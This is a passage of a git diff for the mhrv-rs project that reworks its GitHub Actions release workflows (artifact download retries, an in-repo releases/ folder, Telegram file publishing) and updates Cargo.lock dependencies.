+ cat > /tmp/pr-body.md <\` with a short explanatory clause matching the project's \`• headline (#NN): full explanation\` style. The Conventional-Commit prefix (\`feat:\`/\`fix:\`/etc.) and the trailing \`. Thanks @author\` are already handled. + 3. Commit + push to this branch so the PR includes the final bilingual changelog. + + Any \`[FA]\` or \`\` markers left in the file will ship verbatim into the GitHub Release page and the Telegram post — they're intentionally visible, not hidden in HTML comments. + + **After merging — ship it:** + 1. \`git checkout main && git pull\` + 2. \`git tag v${NEW_VER} && git push origin v${NEW_VER}\` + 3. \`release.yml\` picks up the tag, builds artifacts, creates the GitHub release, and (if enabled) posts to Telegram. + MSG + + gh pr create \ + --base main \ + --head "$BRANCH" \ + --title "release: prepare v${NEW_VER}" \ + --label "release-prep" \ + --body-file /tmp/pr-body.md diff --git a/.github/workflows/release-drafter.yml b/.github/workflows/release-drafter.yml new file mode 100644 index 00000000..60e86445 --- /dev/null +++ b/.github/workflows/release-drafter.yml @@ -0,0 +1,65 @@ +# Updates the draft GitHub release on every push to main, and applies +# Conventional-Commit-derived labels to incoming PRs. Config lives in +# `.github/release-drafter.yml`. The drafter writes one line per merged +# PR into a draft release tagged `next`; `prepare-release.yml` reads +# that body when bumping versions so the English half of +# `docs/changelog/v.md` is prefilled. +# +# Cost: one ubuntu-latest job per relevant PR/push event, single API +# call, no compile, no tests. Zero contention with the self-hosted +# Hetzner runners that release.yml uses. + +name: release-drafter + +on: + push: + branches: [main] + # `pull_request_target` runs in the context of the base branch (main), + # which is what the autolabeler needs to write labels back to PRs — + # including PRs from forks, which the regular `pull_request` event + # doesn't grant write permissions for. We never check out PR code + # in this workflow (only call the action), so the elevated context + # is safe. + pull_request_target: + types: [opened, reopened, synchronize, edited] + +permissions: + contents: read + +jobs: + update-draft: + permissions: + contents: write # write the draft release object + pull-requests: write # apply autolabeler labels to incoming PRs + runs-on: ubuntu-latest + steps: + # Ensure the labels referenced by .github/release-drafter.yml's + # autolabeler block all exist. release-drafter logs a warning and + # skips when it tries to apply a label that's missing — labelling + # itself doesn't fail, but exclude-labels and downstream filtering + # become silent no-ops. `gh label create … || true` is idempotent: + # creates on first run, exits with "already exists" on every run + # after that. Cheap (5 API calls per workflow run, no compile). + - name: Ensure autolabeler labels exist + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + # Format: name|color|description (color without leading #). + while IFS='|' read -r name color desc; do + gh label create "$name" --color "$color" --description "$desc" \ + --repo "${{ github.repository }}" 2>/dev/null || true + done <<'LABELS' + release-prep|ededed|Automated version-bump PR; excluded from release-drafter changelog + type: feature|a2eeef|feat: PR — auto-applied by release-drafter + type: fix|d73a4a|fix: PR — auto-applied by release-drafter + type: chore|cfd3d7|chore: PR — auto-applied by release-drafter + type: docs|0075ca|docs: PR — auto-applied by release-drafter + type: refactor|fbca04|refactor: PR — auto-applied by release-drafter + LABELS + + - uses: release-drafter/release-drafter@v6 + with: + config-name: release-drafter.yml + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 55caa258..8068b30c 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -77,6 +77,17 @@ jobs: - target: x86_64-pc-windows-gnu os: windows-latest name: mhrv-rs-windows-amd64 + # i686-pc-windows-msvc target was attempted in v1.7.7-v1.7.10 + # to support Windows 7 32-bit users (#272, #318). Removed in + # v1.7.11 because keeping it on Rust 1.77.2 (last Win7-stable) + # is fundamentally fragile: every transitive crate that bumps + # its MSRV (e.g. `time` 0.3.47 needs Cargo manifest features + # only available in Rust 1.78+) breaks the build, and pinning + # transitives is brittle across releases. Win7 users should + # self-build per the README; the project no longer ships a + # prebuilt i686 Win7 binary. Replaced by the existing + # x86_64-pc-windows-gnu (windows-amd64) which covers ~99% of + # active Windows installs (incl. all WoA64 emulation). - target: x86_64-unknown-linux-musl os: [self-hosted, linux, x64, mhrv-build] name: mhrv-rs-linux-musl-amd64 @@ -138,9 +149,14 @@ jobs: # installed and the standard target triples are pre-added. It # still verifies the target is present and is cheap enough to keep # as a safety net. - - uses: dtolnay/rust-toolchain@stable + # Per-matrix-entry toolchain selection. Default is `stable` (latest) + # for every target except where `rust_toolchain` is explicitly pinned + # — currently just i686-pc-windows-msvc, which needs 1.77.2 to keep + # the Win7 binary loadable (Rust 1.78+ raised Windows MSRV to Win10). + - uses: dtolnay/rust-toolchain@master if: matrix.mipsel_softfloat != true with: + toolchain: ${{ matrix.rust_toolchain || 'stable' }} targets: ${{ matrix.target }} # Cache target/ + cargo registry across runs — this is the big @@ -159,7 +175,11 @@ jobs: - uses: Swatinem/rust-cache@v2 if: matrix.mipsel_softfloat != true with: - key: ${{ matrix.target }} + # Include toolchain in the cache key so a pinned-Rust target + # (i686-pc-windows-msvc on 1.77.2) doesn't collide with + # stable-Rust caches for other targets, and a future toolchain + # bump invalidates only the affected slot. + key: ${{ matrix.target }}-${{ matrix.rust_toolchain || 'stable' }} cache-bin: "false" # eframe needs a few system libs on Linux for window management, keyboard, @@ -578,10 +598,33 @@ jobs: with: fetch-depth: 0 - - uses: actions/download-artifact@v4 - with: - path: dist - merge-multiple: true + # `actions/download-artifact@v4` has been intermittently flaking on + # this workflow with "5 retries exhausted" on a single artifact (~10 + # of 13). Wrap it in a manual retry — usually the second attempt + # succeeds, the third nails any laggards. We use `gh run download` + # against the current run so we don't depend on the release page + # existing yet (it doesn't until the softprops step below runs). + - name: Download all build artifacts (with retries) + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + mkdir -p dist + for attempt in 1 2 3; do + if gh run download "${GITHUB_RUN_ID}" --dir dist --repo "${GITHUB_REPOSITORY}"; then + echo "downloaded all artifacts on attempt $attempt" + # `gh run download` puts each artifact in its own subdir; + # flatten so downstream steps that expect dist/ work + # the same as `merge-multiple: true` did. + find dist -type f -mindepth 2 -exec mv -f {} dist/ \; + find dist -type d -empty -delete + ls -la dist/ + exit 0 + fi + echo "download attempt $attempt failed; retrying in 30s..." + sleep 30 + done + echo "::error::failed to download artifacts after 3 attempts" + exit 1 # Compose the GitHub release body from `docs/changelog/v.md` # so the Releases page tells humans what actually changed — @@ -608,8 +651,22 @@ jobs: fi { echo 'body<<__RELEASE_BODY_EOF__' - # Strip leading HTML comment that documents the file format. - sed -e '1{/^\s*)+", "", body, count=1, flags=re.S), end="") + PY echo echo '__RELEASE_BODY_EOF__' } >> "$GITHUB_OUTPUT" @@ -636,43 +693,193 @@ jobs: append_body: true generate_release_notes: true - # Notify the Persian-speaking Telegram channel with the CI-built - # Android APK + its sha256 + the per-version changelog from - # `docs/changelog/v.md`. + # Refresh the in-repo `releases/` folder with the latest pre-built + # artifacts so users behind GitHub-Releases-page filtering (the IR + # state network filters the dynamic /releases/ URL but not the static + # `Code → Download ZIP` of the source tree) can still download. + # Practice was started pre-v1.1.0, dropped, then resumed at user + # request after a Telegram-channel suggestion: "فقط داخل پوشه ریلیز + # پروژه اپلود بکن — مشکل دانلود حل میشه — راحت میشه از گیتهاب دانلود + # کرد." The folder holds ONLY the latest version (replace, not + # archive); each tag refresh overwrites the previous artifacts. The + # existing release-page workflow keeps versioned artifacts behind + # `https://github.com/.../releases/tag/v...` for users who can reach + # that URL — this in-repo folder is the fallback for users who can't. + commit-releases: + needs: [build, android, release] + runs-on: ubuntu-latest + permissions: + contents: write + steps: + # Always check out main, not the tag — we're committing back to + # the moving branch. fetch-depth 0 so `git push origin HEAD:main` + # has the lineage to fast-forward. + - uses: actions/checkout@v4 + with: + ref: main + fetch-depth: 0 + + # Pull artifacts from the GitHub Release page (which the `release` + # job populated a few seconds earlier) rather than the workflow + # artifacts API. The artifacts API path — + # `actions/download-artifact@v4` with `merge-multiple: true` — + # has been failing with "artifact download failed after 5 + # retries" on one of the ~13 artifacts on multiple consecutive + # runs (v1.7.5 retrigger, v1.7.6). The 10 fast downloads that + # complete first all succeed; the 11th-13th hit the error. + # `gh release download` reads from GitHub's Release-page CDN, + # which is independent of the artifacts blob store and has a + # different retry / rate-limit profile. Same files, more + # reliable surface. + - name: Download artifacts from the GitHub Release page + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + VER="${{ inputs.version || github.ref_name }}" + # Strip leading `v` to normalize, then re-add — the Release + # tag is `vX.Y.Z`, but for the rest of the workflow we use + # bare `X.Y.Z`. Mirror the same pattern here so a downstream + # readme update can use the bare version. + VER="${VER#v}" + mkdir -p artifacts + gh release download "v${VER}" \ + --repo "${{ github.repository }}" \ + --dir artifacts \ + --pattern '*.tar.gz' \ + --pattern '*.zip' \ + --pattern '*.apk' + echo "--- artifacts/ contents ---" + ls -la artifacts/ + + - name: Refresh releases/ folder + run: | + set -euo pipefail + VER="${{ inputs.version || github.ref_name }}" + VER="${VER#v}" + + mkdir -p releases + + # Wipe old binary artifacts (.apk, .tar.gz, .zip) but keep + # README.md and .gitattributes — those are folder-level docs + # that stay constant across versions and shouldn't be + # regenerated on every release. + find releases -maxdepth 1 -type f \ + \( -name '*.apk' -o -name '*.tar.gz' -o -name '*.zip' \) \ + -delete + + # Copy desktop archives. Their names already include the + # platform identifier (mhrv-rs-linux-amd64.tar.gz, etc.) and + # are version-stable — no rename needed. + for f in artifacts/*.tar.gz artifacts/*.zip; do + [ -f "$f" ] || continue + cp "$f" "releases/$(basename "$f")" + done + + # Android APKs come with the version baked into the name + # (mhrv-rs-android-universal-v1.7.5.apk). Copy all of them so + # users on slow connections can grab a per-ABI APK (~37 MB) + # instead of the universal (~110 MB). + for f in artifacts/mhrv-rs-android-*.apk; do + [ -f "$f" ] || continue + cp "$f" "releases/$(basename "$f")" + done + + # Update the "Current version" line in releases/README.md + # (both English and Persian copies) and APK filename refs so + # the doc stays accurate. `sed -i` BSD/GNU compatibility is + # handled by passing an empty extension explicitly — runner + # is Linux so `-i` alone works, but the empty-string form + # also works on macOS for anyone running this locally. + if [ -f releases/README.md ]; then + sed -i.bak \ + -e "s/Current version: \*\*v[0-9][0-9.]*\*\*/Current version: **v${VER}**/" \ + -e "s/نسخهٔ فعلی: \*\*v[0-9][0-9.]*\*\*/نسخهٔ فعلی: **v${VER}**/" \ + -e "s/mhrv-rs-android-universal-v[0-9][0-9.]*\.apk/mhrv-rs-android-universal-v${VER}.apk/g" \ + releases/README.md + rm -f releases/README.md.bak + fi + + echo "--- releases/ contents after refresh ---" + ls -la releases/ + + - name: Commit + push to main + run: | + set -euo pipefail + VER="${{ inputs.version || github.ref_name }}" + VER="${VER#v}" + + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + + git add releases + if git diff --cached --quiet; then + echo "No releases/ changes to commit (artifacts identical to current HEAD?)." + exit 0 + fi + + git commit -m "chore(releases): refresh prebuilt binaries for v${VER}" \ + -m "Auto-committed by release workflow so users behind GitHub-Releases-page filtering can download via the in-repo releases/ folder. The GitHub Release page itself still has the canonical versioned artifacts; this folder is the fallback path for users who can only reach the static source tree (Code → Download ZIP)." + + # Push to main. The release workflow runs on the tag commit, + # which is reachable from main as a fast-forward — push is + # straightforward, no force needed. Tag protection rules + # apply to refs/tags/* not refs/heads/main, so this push + # isn't gated by the same protection. + git push origin HEAD:main + + # ─────────── LEGACY — DORMANT BY DEFAULT ─────────── + # + # Posts the universal APK + per-version changelog to the **main** + # Telegram channel as one big sendDocument + sendMessage pair. + # + # Superseded as of v1.8.0+ by `.github/workflows/telegram-publish-files.yml`, + # which posts each platform's artifact individually to the **files** + # channel (with SHA-256 captions) and then a single cross-link + # message to the main channel pointing at the files-channel anchor. + # + # This job stays in the source tree, dormant, in case we ever want + # to revert to the bundled-changelog-on-main-channel pattern (or + # use both at once during a transition). To turn it back on: + # + # gh variable set TELEGRAM_NOTIFY_ENABLED --body true # - # Two Telegram API calls: - # 1. sendDocument — APK file + a short caption (Telegram caps - # captions at 1024 chars, and we have bigger changelogs than - # that). - # 2. sendMessage — full changelog as a reply to #1, Persian - # quote-block first then English, same pattern as the - # previous manual post. No emojis, as the user asked. + # Note: with the new workflow active too, that produces TWO posts + # to the main channel per release (the legacy APK+changelog *and* + # the new cross-link). Pick one. # - # Needs two repo secrets: - # TELEGRAM_BOT_TOKEN — bot the channel admits as poster - # TELEGRAM_CHAT_ID — numeric chat id (starts with -100...) - # Missing either => the whole job is skipped (not failed) so a - # forker who hasn't set up a Telegram channel gets a clean release. + # Default state is disabled. telegram: needs: [android, release] runs-on: ubuntu-latest # Gated on the repo variable `TELEGRAM_NOTIFY_ENABLED`. Default is - # OFF — the job skips silently unless the variable is set to the - # literal string "true". Toggle via: - # - # gh variable set TELEGRAM_NOTIFY_ENABLED --body true - # gh variable set TELEGRAM_NOTIFY_ENABLED --body false - # - # Keeping the machinery (script + secrets) in place so flipping - # the switch back on is a one-liner, not a workflow edit. + # off — the job skips silently unless the variable is set to the + # literal string "true". if: ${{ vars.TELEGRAM_NOTIFY_ENABLED == 'true' && needs.android.result == 'success' }} steps: - uses: actions/checkout@v4 - - uses: actions/download-artifact@v4 - with: - name: mhrv-rs-android-universal - path: apk + # Same retry pattern as the `release` job above — `actions/download-artifact@v4` + # has been flaking on this workflow with 5-retries-exhausted errors. + - name: Download universal APK (with retries) + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + mkdir -p apk + for attempt in 1 2 3; do + if gh run download "${GITHUB_RUN_ID}" \ + --name mhrv-rs-android-universal \ + --dir apk \ + --repo "${GITHUB_REPOSITORY}"; then + echo "downloaded universal APK on attempt $attempt" + ls -la apk/ + exit 0 + fi + echo "download attempt $attempt failed; retrying in 30s..." + sleep 30 + done + echo "::error::failed to download universal APK after 3 attempts" + exit 1 - name: Post to Telegram env: diff --git a/.github/workflows/telegram-publish-files.yml b/.github/workflows/telegram-publish-files.yml new file mode 100644 index 00000000..e7d956b9 --- /dev/null +++ b/.github/workflows/telegram-publish-files.yml @@ -0,0 +1,137 @@ +name: Telegram publish release files + +# Posts every release artifact (Android APKs, Windows ZIP, macOS, Linux, +# OpenWRT, Raspbian) to the Telegram channel as individual messages with +# Persian captions and a #v hashtag. Files larger +# than the bot API's 50 MB ceiling are split into ~45 MB byte chunks +# server-side and posted as `.part_aa`, `.part_ab`, ... — recipients +# reassemble with `cat .part_* > `. +# +# This workflow is decoupled from `release.yml` so it can be re-triggered +# for any historical tag (e.g. to re-post v1.8.0 after a Telegram channel +# wipe) without rebuilding artifacts. It downloads from the GitHub Release +# page directly via `gh release download`, so the assets must already +# exist there. + +on: + workflow_dispatch: + inputs: + version: + description: 'Release tag to publish (with or without the v prefix, e.g. 1.8.0 or v1.8.0)' + required: true + type: string + # Auto-trigger after a successful `release` workflow run. Posts files + # to Telegram once the release page exists. The `head_branch` of the + # triggering run is the tag name (e.g. `v1.8.0`) on tag-pushed releases, + # which is what we feed `gh release download`. + workflow_run: + workflows: [release] + types: [completed] + +permissions: + contents: read + +jobs: + publish: + # Skip when triggered by a `release` run that didn't succeed — no + # point posting half a release. Manual `workflow_dispatch` always + # runs (the user explicitly asked for it). + if: | + github.event_name == 'workflow_dispatch' + || github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + # Sparse checkout would be nicer but stock checkout is fast + # enough for a 5 MB workflow file + ~200 KB script. + fetch-depth: 1 + + - name: Resolve version + hashtag + id: ver + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + if [ -n "${{ inputs.version || '' }}" ]; then + VER="${{ inputs.version }}" + else + # workflow_run path. `head_branch` for a tag-pushed release + # workflow is the tag name (e.g. `v1.8.0`). + VER="${{ github.event.workflow_run.head_branch || '' }}" + fi + if [ -z "$VER" ]; then + echo "::error::could not determine version from inputs or workflow_run trigger" + exit 1 + fi + # Strip the leading `v` if present. + VER="${VER#v}" + # Hashtag: `#v` + version with dots removed. So 1.8.0 → #v180, + # 1.8.10 → #v1810, 2.0.0 → #v200. Predictable across releases. + HASHTAG="#v$(echo "$VER" | tr -d '.')" + echo "version=$VER" >> "$GITHUB_OUTPUT" + echo "hashtag=$HASHTAG" >> "$GITHUB_OUTPUT" + echo "Resolved: version=$VER hashtag=$HASHTAG" + + - name: Download release assets + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + mkdir -p assets + # Mirror the retry pattern from `release.yml`'s download step — + # GitHub's release-asset CDN occasionally times out on cold + # tags. Three attempts with 30 s backoff covers most flakes. + for attempt in 1 2 3; do + if gh release download "v${{ steps.ver.outputs.version }}" \ + --dir assets \ + --repo "${GITHUB_REPOSITORY}"; then + echo "downloaded release assets on attempt $attempt" + ls -la assets/ + exit 0 + fi + echo "attempt $attempt failed; retrying in 30s..." + sleep 30 + done + echo "::error::failed to download release assets after 3 attempts" + exit 1 + + - name: Publish files to Telegram channel + env: + BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }} + # The files channel — supergroup-style negative ID, hard-coded + # rather than templated as a repo variable because there's only + # ever one of these and putting it in source makes the workflow + # auditable. The bot token already has post permissions there. + CHAT_ID: '-1003966234444' + # The main announcement channel. Receives a single cross-link + # message per release pointing at the file-channel anchor post, + # instead of the previous behaviour of attaching the universal + # APK + full changelog. Sourced from the same secret the + # legacy `telegram` job in release.yml used. + MAIN_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }} + # Public-username form of the files channel link. Used for + # both (a) the post-link in the main-channel cross-post — so + # `t.me//` works for everyone, not just members + # via `t.me/c//` — and (b) one of the two + # channel-join links rendered at the bottom of the cross-post. + # Defaults to `mhrv_rs` (current public username); override via + # repo variable if the channel is renamed. + FILES_CHANNEL_USERNAME: ${{ vars.FILES_CHANNEL_USERNAME || 'mhrv_rs' }} + # `t.me/+` invite link for the files channel. Rendered + # as the second channel-join option in the main-channel + # cross-post — the only join path that works for users coming + # from outside Telegram search (private/restricted channels) + # or whose Telegram client doesn't resolve usernames cleanly. + # Override via repo variable if the channel's invite hash is + # rotated. + FILES_CHANNEL_INVITE: ${{ vars.FILES_CHANNEL_INVITE || 'https://t.me/+R1OyoHX2boA1ZDgx' }} + run: | + if [ -z "${BOT_TOKEN:-}" ]; then + echo "::error::TELEGRAM_BOT_TOKEN not set; can't publish" + exit 1 + fi + python3 .github/scripts/telegram_publish_files.py \ + --assets-dir assets \ + --version "${{ steps.ver.outputs.version }}" \ + --hashtag "${{ steps.ver.outputs.hashtag }}" diff --git a/Cargo.lock b/Cargo.lock index 66a711c2..05ff07cd 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -160,6 +160,12 @@ dependencies = [ "windows-sys 0.61.2", ] +[[package]] +name = "anyhow" +version = "1.0.102" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c" + [[package]] name = "arboard" version = "3.6.1" @@ -173,7 +179,7 @@ dependencies = [ "objc2-foundation 0.3.2", "parking_lot", "percent-encoding", - "windows-sys 0.52.0", + "windows-sys 0.60.2", "x11rb", ] @@ -556,6 +562,17 @@ dependencies = [ "libc", ] +[[package]] +name = "chacha20" +version = "0.10.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6f8d983286843e49675a4b7a2d174efe136dc93a18d69130dd18198a6c167601" +dependencies = [ + "cfg-if", + "cpufeatures 0.3.0", + "rand_core 0.10.1", +] + [[package]] name = "chrono" version = "0.4.44" @@ -753,6 +770,15 @@ dependencies = [ "libc", ] +[[package]] +name = "cpufeatures" +version = "0.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8b2a41393f66f16b0823bb79094d54ac5fbd34ab292ddafb9a0456ac9f87d201" +dependencies = [ + "libc", +] + [[package]] name = "crc32fast" version = "1.5.0" @@ -1070,18 +1096,6 @@ dependencies = [ "serde", ] -[[package]] -name = "enum-as-inner" -version = "0.6.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc" -dependencies = [ - "heck", - "proc-macro2", - "quote", - "syn 2.0.117", -] - [[package]] name = "enumn" version = "0.1.14" @@ -1417,8 +1431,22 @@ checksum = "899def5c37c4fd7b2664648c28120ecec138e4d395b459e5ca34f9cce2dd77fd" dependencies = [ "cfg-if", "libc", - "r-efi", + "r-efi 5.3.0", + "wasip2", +] + +[[package]] +name = "getrandom" +version = "0.4.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0de51e6874e94e7bf76d726fc5d13ba782deca734ff60d5bb2fb2607c7406555" +dependencies = [ + "cfg-if", + "libc", + "r-efi 6.0.0", + "rand_core 0.10.1", "wasip2", + "wasip3", ] [[package]] @@ -1654,25 +1682,19 @@ checksum = "dfa686283ad6dd069f105e5ab091b04c62850d3e4cf5d67debad1933f55023df" [[package]] name = "hickory-proto" -version = "0.25.2" +version = "0.26.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8a6fe56c0038198998a6f217ca4e7ef3a5e51f46163bd6dd60b5c71ca6c6502" +checksum = "a916d0494600d99ecb15aadfab677ad97c4de559e8f1af0c129353a733ac1fcc" dependencies = [ - "async-trait", - "cfg-if", "data-encoding", - "enum-as-inner", - "futures-channel", - "futures-io", - "futures-util", "idna", "ipnet", + "jni 0.22.4", "once_cell", - "rand 0.9.4", + "rand 0.10.1", "ring", "thiserror 2.0.18", "tinyvec", - "tokio", "tracing", "url", ] @@ -1810,6 +1832,12 @@ dependencies = [ "zerovec", ] +[[package]] +name = "id-arena" +version = "2.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3d3067d79b975e8844ca9eb072e16b31c3c1c36928edf9c6789548c524d0d954" + [[package]] name = "idna" version = "1.1.0" @@ -1852,6 +1880,8 @@ checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9" dependencies = [ "equivalent", "hashbrown 0.17.0", + "serde", + "serde_core", ] [[package]] @@ -2030,6 +2060,12 @@ version = "1.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe" +[[package]] +name = "leb128fmt" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "09edd9e8b54e49e587e4f6295a7d29c3ea94d469cb40ab8ca70b288248a81db2" + [[package]] name = "libc" version = "0.2.185" @@ -2186,7 +2222,7 @@ dependencies = [ [[package]] name = "mhrv-rs" -version = "1.6.0" +version = "1.9.2" dependencies = [ "base64 0.22.1", "bytes", @@ -2861,6 +2897,16 @@ version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e8cf8e6a8aa66ce33f63993ffc4ea4271eb5b0530a9002db8455ea6050c77bfa" +[[package]] +name = "prettyplease" +version = "0.2.37" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b" +dependencies = [ + "proc-macro2", + "syn 2.0.117", +] + [[package]] name = "proc-macro-crate" version = "3.5.0" @@ -2915,6 +2961,12 @@ version = "5.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f" +[[package]] +name = "r-efi" +version = "6.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f8dcc9c7d52a811697d2151c701e0d08956f92b0e24136cf4cf27b57a6a0d9bf" + [[package]] name = "rand" version = "0.8.6" @@ -2936,6 +2988,17 @@ dependencies = [ "rand_core 0.9.5", ] +[[package]] +name = "rand" +version = "0.10.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d2e8e8bcc7961af1fdac401278c6a831614941f6164ee3bf4ce61b7edb162207" +dependencies = [ + "chacha20", + "getrandom 0.4.2", + "rand_core 0.10.1", +] + [[package]] name = "rand_chacha" version = "0.3.1" @@ -2974,6 +3037,12 @@ dependencies = [ "getrandom 0.3.4", ] +[[package]] +name = "rand_core" +version = "0.10.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "63b8176103e19a2643978565ca18b50549f6101881c443590420e4dc998a3c69" + [[package]] name = "raw-window-handle" version = "0.5.2" @@ -3163,7 +3232,7 @@ dependencies = [ "errno", "libc", "linux-raw-sys 0.4.15", - "windows-sys 0.52.0", + "windows-sys 0.59.0", ] [[package]] @@ -3305,7 +3374,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283" dependencies = [ "cfg-if", - "cpufeatures", + "cpufeatures 0.2.17", "digest", ] @@ -3461,9 +3530,9 @@ dependencies = [ [[package]] name = "socks5-impl" -version = "0.8.1" +version = "0.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1eae7c78f163b7805f66493c787d7bad4816146faf0cf655d57c78b90c383ce3" +checksum = "150816c2d954315f351129f438f851285e1ddb6d6ccc850ddd45c523d19abda0" dependencies = [ "async-trait", "bytes", @@ -3567,7 +3636,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd" dependencies = [ "fastrand", - "getrandom 0.3.4", + "getrandom 0.4.2", "once_cell", "rustix 1.1.4", "windows-sys 0.61.2", @@ -3891,9 +3960,9 @@ dependencies = [ [[package]] name = "tun2proxy" -version = "0.7.20" +version = "0.7.21" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0576f75fd691ad86cdc4348f29fb8770037ab8140179f1f9f8f6991f7ebd2176" +checksum = "d336ad07beb04a9e219972fcdc54a71d2586cdfd35ac03551a629e4ca328db3c" dependencies = [ "android_logger", "async-trait", @@ -4061,7 +4130,16 @@ version = "1.0.3+wasi-0.2.9" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "20064672db26d7cdc89c7798c48a0fdfac8213434a1186e5ef29fd560ae223d6" dependencies = [ - "wit-bindgen", + "wit-bindgen 0.57.1", +] + +[[package]] +name = "wasip3" +version = "0.4.0+wasi-0.3.0-rc-2026-01-06" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5428f8bf88ea5ddc08faddef2ac4a67e390b88186c703ce6dbd955e1c145aca5" +dependencies = [ + "wit-bindgen 0.51.0", ] [[package]] @@ -4119,6 +4197,40 @@ dependencies = [ "unicode-ident", ] +[[package]] +name = "wasm-encoder" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "990065f2fe63003fe337b932cfb5e3b80e0b4d0f5ff650e6985b1048f62c8319" +dependencies = [ + "leb128fmt", + "wasmparser", +] + +[[package]] +name = "wasm-metadata" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bb0e353e6a2fbdc176932bbaab493762eb1255a7900fe0fea1a2f96c296cc909" +dependencies = [ + "anyhow", + "indexmap", + "wasm-encoder", + "wasmparser", +] + +[[package]] +name = "wasmparser" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe" +dependencies = [ + "bitflags 2.11.1", + "hashbrown 0.15.5", + "indexmap", + "semver", +] + [[package]] name = "wayland-backend" version = "0.3.15" @@ -4467,7 +4579,7 @@ version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.61.2", + "windows-sys 0.48.0", ] [[package]] @@ -4945,12 +5057,100 @@ dependencies = [ "winreg", ] +[[package]] +name = "wit-bindgen" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5" +dependencies = [ + "wit-bindgen-rust-macro", +] + [[package]] name = "wit-bindgen" version = "0.57.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1ebf944e87a7c253233ad6766e082e3cd714b5d03812acc24c318f549614536e" +[[package]] +name = "wit-bindgen-core" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ea61de684c3ea68cb082b7a88508a8b27fcc8b797d738bfc99a82facf1d752dc" +dependencies = [ + "anyhow", + "heck", + "wit-parser", +] + +[[package]] +name = "wit-bindgen-rust" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b7c566e0f4b284dd6561c786d9cb0142da491f46a9fbed79ea69cdad5db17f21" +dependencies = [ + "anyhow", + "heck", + "indexmap", + "prettyplease", + "syn 2.0.117", + "wasm-metadata", + "wit-bindgen-core", + "wit-component", +] + +[[package]] +name = "wit-bindgen-rust-macro" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0c0f9bfd77e6a48eccf51359e3ae77140a7f50b1e2ebfe62422d8afdaffab17a" +dependencies = [ + "anyhow", + "prettyplease", + "proc-macro2", + "quote", + "syn 2.0.117", + "wit-bindgen-core", + "wit-bindgen-rust", +] + +[[package]] +name = "wit-component" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2" +dependencies = [ + "anyhow", + "bitflags 2.11.1", + "indexmap", + "log", + "serde", + "serde_derive", + "serde_json", + "wasm-encoder", + "wasm-metadata", + "wasmparser", + "wit-parser", +] + +[[package]] +name = "wit-parser" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 